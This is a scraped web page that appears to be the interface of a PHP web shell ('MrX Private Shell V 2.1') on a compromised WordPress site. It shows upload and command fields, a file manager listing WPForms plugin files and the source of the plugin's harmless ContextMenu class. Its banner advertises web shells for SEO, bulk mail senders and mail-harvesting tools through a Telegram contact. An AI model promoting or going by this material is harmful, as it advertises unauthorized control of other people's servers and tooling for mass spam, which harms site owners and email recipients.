__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

namespace WPForms\Admin\Builder;

/**
 * Context Menu class.
 *
 * @since 1.8.6
 */
class ContextMenu {

	/**
	 * Init class.
	 *
	 * @since 1.8.6
	 */
	public function init() {

		$this->hooks();
	}

	/**
	 * Register hooks.
	 *
	 * @since 1.8.6
	 */
	protected function hooks() {

		add_action( 'wpforms_builder_enqueues', [ $this, 'enqueues' ] );
		add_action( 'wpforms_admin_page', [ $this, 'output' ], 20 );
	}

	/**
	 * Enqueue assets.
	 *
	 * @since 1.8.6
	 */
	public function enqueues() {

		$min = wpforms_get_min_suffix();

		wp_enqueue_script(
			'wpforms-builder-context-menu',
			WPFORMS_PLUGIN_URL . "assets/js/admin/builder/context-menu{$min}.js",
			[ 'wpforms-builder' ],
			WPFORMS_VERSION,
			true
		);
	}

	/**
	 * Output context menu markup.
	 *
	 * @since 1.8.6
	 */
	public function output() {

		// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
		echo wpforms_render( 'builder/field-context-menu' );
	}
}

Filemanager

Name Type Size Permission Actions
Ajax Folder 0775
Notifications Folder 0775
Settings Folder 0775
Addons.php File 10.16 KB 0775
AntiSpam.php File 12.49 KB 0775
ContextMenu.php File 953 B 0775
Help.php File 53.34 KB 0775
HelpCache.php File 1.16 KB 0775
ImageUpload.php File 789 B 0775
Shortcuts.php File 3.23 KB 0775
TemplateSingleCache.php File 5.38 KB 0775
Templates.php File 35.32 KB 0775
TemplatesCache.php File 5.66 KB 0775
Filemanager